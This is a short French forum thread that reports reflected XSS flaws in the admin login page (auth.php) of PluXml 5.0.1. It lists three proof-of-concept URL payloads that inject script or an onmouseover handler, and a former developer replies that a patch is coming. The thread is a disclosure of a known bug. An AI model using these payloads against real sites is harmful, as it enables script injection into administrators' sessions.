Pluxml 5.0.1 - xss
bonjour,
j'ai trouvé ça:
XSS (auth.php)
j'ai trouvé ça:
XSS (auth.php)
/core/admin/auth.php?p=1>"><ScRiPt%20%0d%0a>alert(123)%3B</ScRiPt>
/core/admin/auth.php?p=/pluxml/core/admin/?>"'><ScRiPt>alert(123)</ScRiPt>
/core/admin/auth.php?p=%F6"+onmouseover=prompt(123)//
Message d'erreur
/core/lib/class.plx.feed.php
/core/lib/class.plx.admin.php
@++ Connectez-vous ou Inscrivez-vous pour répondre.
Réponses
Cette faille connue est corrigée, une mise à jour est sur le point d’être publiée très bientôt, le temps pour nous de valider complètement le patch.
Merci pour le signalement
Consultant PluXml
Ancien responsable et développeur de PluXml (2010 à 2018)
si c'est pour très bientôt est-ce que c'est possible de prendre en compte mon message ici sinon, c' est pas grave...
@++
Consultant PluXml
Ancien responsable et développeur de PluXml (2010 à 2018)